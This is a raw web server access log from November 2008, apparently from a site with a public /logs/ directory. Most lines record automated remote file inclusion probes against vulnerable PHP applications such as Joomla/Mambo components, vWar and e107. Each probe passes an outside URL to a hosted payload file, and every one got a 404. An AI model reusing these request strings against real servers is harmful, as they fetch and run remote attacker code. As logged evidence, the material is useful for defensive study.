83.149.69.97 - - [03/Nov/2008:00:37:15 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:37:22 -0600] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:37:40 -0600] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
69.72.144.18 - - [03/Nov/2008:00:41:34 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:00:41:34 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.6.18.228 - - [03/Nov/2008:00:45:59 -0600] "GET /artwork/txt.htm HTTP/1.0" 200 3880 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.32.94.162 - - [03/Nov/2008:00:46:51 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
216.32.94.162 - - [03/Nov/2008:00:46:51 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
66.40.52.30 - - [03/Nov/2008:00:48:53 -0600] "GET //errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:48:53 -0600] "GET /logs//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:48:54 -0600] "GET /logs/access_log.1205366400//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:49:41 -0600] "GET /logs/access_log.1208044800//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.800"
74.6.18.228 - - [03/Nov/2008:01:00:37 -0600] "GET /logs/access_log.1214092800 HTTP/1.0" 200 467725 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.181.72.244 - - [03/Nov/2008:01:05:16 -0600] "GET / HTTP/1.1" 200 1243 "-""Java/1.6.0_07"
219.85.63.226 - - [03/Nov/2008:01:12:41 -0600] "GET ///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
219.85.63.226 - - [03/Nov/2008:01:12:41 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
219.85.63.226 - - [03/Nov/2008:01:12:41 -0600] "GET /logs/access_log.1214870400///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
219.85.63.226 - - [03/Nov/2008:01:12:53 -0600] "GET /logs/access_log.1215561600///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
219.85.63.226 - - [03/Nov/2008:01:13:18 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:01:13:18 -0600] "GET ///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
65.18.169.40 - - [03/Nov/2008:01:14:07 -0600] "GET /logs/access_log.1208217600/auth.php?inc_dir=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
65.18.169.40 - - [03/Nov/2008:01:14:07 -0600] "GET /auth.php?inc_dir=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
65.18.169.40 - - [03/Nov/2008:01:14:07 -0600] "GET /logs/auth.php?inc_dir=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:01:14:10 -0600] "GET /logs/access_log.1214870400///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
219.85.63.226 - - [03/Nov/2008:01:14:27 -0600] "GET ///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [03/Nov/2008:01:14:27 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [03/Nov/2008:01:14:28 -0600] "GET /logs/access_log.1214870400///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [03/Nov/2008:01:15:15 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:01:15:15 -0600] "GET ///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
65.18.169.40 - - [03/Nov/2008:01:15:59 -0600] "GET /logs/access_log.1206576000/auth.php?inc_dir=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:01:16:26 -0600] "GET /logs/access_log.1215561600///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [03/Nov/2008:01:20:07 -0600] "GET /logs/access_log.1214870400///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [03/Nov/2008:01:20:07 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [03/Nov/2008:01:20:07 -0600] "GET ///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
219.85.63.226 - - [03/Nov/2008:01:20:52 -0600] "GET /logs/access_log.1215561600///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
88.86.110.83 - - [03/Nov/2008:01:22:56 -0600] "GET /logs/access_log.1205366400//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
88.86.110.83 - - [03/Nov/2008:01:22:56 -0600] "GET /logs//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
88.86.110.83 - - [03/Nov/2008:01:22:56 -0600] "GET //errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
66.235.124.29 - - [03/Nov/2008:01:23:19 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.29 - - [03/Nov/2008:01:23:19 -0600] "GET /artwork/dressers.htm HTTP/1.0" 200 1093 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
88.86.110.83 - - [03/Nov/2008:01:23:58 -0600] "GET /logs/access_log.1208044800//errors.php?error=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
219.85.63.226 - - [03/Nov/2008:01:26:51 -0600] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
219.85.63.226 - - [03/Nov/2008:01:26:51 -0600] "GET ///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
219.85.63.226 - - [03/Nov/2008:01:26:56 -0600] "GET /logs/access_log.1214870400///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.40.52.30 - - [03/Nov/2008:01:28:05 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:01:28:05 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
64.38.4.3 - - [03/Nov/2008:01:32:08 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
64.38.4.3 - - [03/Nov/2008:01:32:08 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
77.221.151.34 - - [03/Nov/2008:01:32:42 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
77.221.151.34 - - [03/Nov/2008:01:32:42 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
65.55.208.132 - - [03/Nov/2008:01:33:09 -0600] "GET /logs/access_log.1211414400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [03/Nov/2008:01:33:09 -0600] "GET /logs/access_log.1195171200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.218.85.18 - - [03/Nov/2008:01:33:45 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:01:33:45 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:01:35:19 -0600] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.218.85.18 - - [03/Nov/2008:01:35:19 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.218.85.18 - - [03/Nov/2008:01:35:19 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
87.106.16.18 - - [03/Nov/2008:01:35:39 -0600] "GET /logs/access_log.1214179200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:01:35:43 -0600] "GET /logs/access_log.1217203200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
89.218.85.18 - - [03/Nov/2008:01:37:59 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.218.85.18 - - [03/Nov/2008:01:40:16 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:01:40:16 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.197.231.29 - - [03/Nov/2008:01:44:31 -0600] "GET /logs//main.php?sayfa=http://jaxyguy.110mb.com/ids.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
91.197.231.29 - - [03/Nov/2008:01:44:31 -0600] "GET //main.php?sayfa=http://jaxyguy.110mb.com/ids.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
91.197.231.29 - - [03/Nov/2008:01:44:32 -0600] "GET /logs//main.php?sayfa=http://jaxyguy.110mb.com/ids.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
91.197.231.29 - - [03/Nov/2008:01:44:32 -0600] "GET /logs//main.php?sayfa=http://www.cooljobslinks.com//config/arab.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
91.197.231.29 - - [03/Nov/2008:01:44:32 -0600] "GET /logs//main.php?sayfa=http://jaxyguy.110mb.com/ids.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
91.197.231.29 - - [03/Nov/2008:01:44:32 -0600] "GET //main.php?sayfa=http://jaxyguy.110mb.com/ids.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
91.197.231.29 - - [03/Nov/2008:01:44:32 -0600] "GET //main.php?sayfa=http://www.cooljobslinks.com//config/arab.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
91.197.231.29 - - [03/Nov/2008:01:44:32 -0600] "GET //main.php?sayfa=http://jaxyguy.110mb.com/ids.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
89.218.85.18 - - [03/Nov/2008:01:44:49 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:01:44:49 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.6.18.228 - - [03/Nov/2008:01:47:04 -0600] "GET /logs/?D=D HTTP/1.0" 200 105314 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.245.18.122 - - [03/Nov/2008:01:49:46 -0600] "GET /logs/access_log.1205366400//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 322 "-""libwww-perl/5.79"
201.245.18.122 - - [03/Nov/2008:01:49:46 -0600] "GET //vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 295 "-""libwww-perl/5.79"
201.245.18.122 - - [03/Nov/2008:01:49:46 -0600] "GET /logs//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 300 "-""libwww-perl/5.79"
65.55.208.132 - - [03/Nov/2008:01:51:54 -0600] "GET /logs/access_log.1194998400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
201.245.18.122 - - [03/Nov/2008:01:52:14 -0600] "GET /logs/access_log.1208044800//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 322 "-""libwww-perl/5.79"
216.29.152.64 - - [03/Nov/2008:01:59:32 -0600] "GET /logs/index1.php?page=http://www.pnladistancia.com.ar/vnc/albania.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
216.29.152.64 - - [03/Nov/2008:01:59:32 -0600] "GET /logs/index1.php?page=http://www.pnladistancia.com.ar/vnc/albania.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
216.29.152.64 - - [03/Nov/2008:01:59:32 -0600] "GET /index1.php?page=http://www.pnladistancia.com.ar/vnc/albania.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
216.29.152.64 - - [03/Nov/2008:01:59:32 -0600] "GET /index1.php?page=http://www.pnladistancia.com.ar/vnc/albania.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
91.192.241.74 - - [03/Nov/2008:02:00:29 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.64"
91.192.241.74 - - [03/Nov/2008:02:00:29 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.64"
91.192.241.74 - - [03/Nov/2008:02:00:29 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.64"
91.192.241.74 - - [03/Nov/2008:02:00:29 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.64"
66.120.7.147 - - [03/Nov/2008:02:08:41 -0600] "GET /logs//e107_plugins/macgurublog_menu/macgurublog.php?uid=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
66.120.7.147 - - [03/Nov/2008:02:08:41 -0600] "GET //e107_plugins/macgurublog_menu/macgurublog.php?uid=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
66.120.7.147 - - [03/Nov/2008:02:08:41 -0600] "GET /logs//e107_plugins/macgurublog_menu/macgurublog.php?uid=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
66.120.7.147 - - [03/Nov/2008:02:08:42 -0600] "GET //e107_plugins/macgurublog_menu/macgurublog.php?uid=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:08:47 -0600] "GET /logs/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:08:47 -0600] "GET /errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.199.120.19 - - [03/Nov/2008:02:08:51 -0600] "GET /logs//modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
91.199.120.19 - - [03/Nov/2008:02:08:51 -0600] "GET //modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
91.199.120.19 - - [03/Nov/2008:02:08:52 -0600] "GET /logs//modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
91.199.120.19 - - [03/Nov/2008:02:08:52 -0600] "GET //modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
91.199.120.19 - - [03/Nov/2008:02:08:54 -0600] "GET /logs//modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
91.199.120.19 - - [03/Nov/2008:02:08:54 -0600] "GET //modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
66.40.52.30 - - [03/Nov/2008:02:13:17 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:13:17 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:13:17 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.800"
79.170.90.64 - - [03/Nov/2008:02:14:37 -0600] "GET /logs//modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:02:14:39 -0600] "GET //modules/vWar_Account/includes/functions_common.php?vwar_root=http://sagraduates.com/s.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:02:15:00 -0600] "GET //vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:02:15:00 -0600] "GET /logs/access_log.1205366400//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:02:15:00 -0600] "GET /logs//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
74.6.18.228 - - [03/Nov/2008:02:16:05 -0600] "GET /logs/access_log.1212364800 HTTP/1.0" 200 518223 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.144.158.163 - - [03/Nov/2008:02:17:41 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
202.144.158.163 - - [03/Nov/2008:02:17:41 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
202.144.158.163 - - [03/Nov/2008:02:17:41 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:02:17:59 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:02:18:00 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.85.192.194 - - [03/Nov/2008:02:18:07 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.85.192.194 - - [03/Nov/2008:02:18:07 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.85.192.194 - - [03/Nov/2008:02:18:07 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.85.192.194 - - [03/Nov/2008:02:18:08 -0600] "GET /logs/access_log.1216339200/index.php?link=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.85.192.194 - - [03/Nov/2008:02:18:09 -0600] "GET /index.php?link=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.40.52.30 - - [03/Nov/2008:02:18:09 -0600] "GET /index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:18:09 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
70.85.192.194 - - [03/Nov/2008:02:18:21 -0600] "GET /logs/index.php?link=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.85.192.194 - - [03/Nov/2008:02:18:21 -0600] "GET /logs/access_log.1215993600/index.php?link=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.55.208.123 - - [03/Nov/2008:02:18:40 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [03/Nov/2008:02:18:40 -0600] "GET /logs/access_log.1155859200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [03/Nov/2008:02:18:40 -0600] "GET /logs/access_log.1157068800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [03/Nov/2008:02:18:40 -0600] "GET /logs/access_log.1180742400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [03/Nov/2008:02:18:41 -0600] "GET /logs/access_log.1170720000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
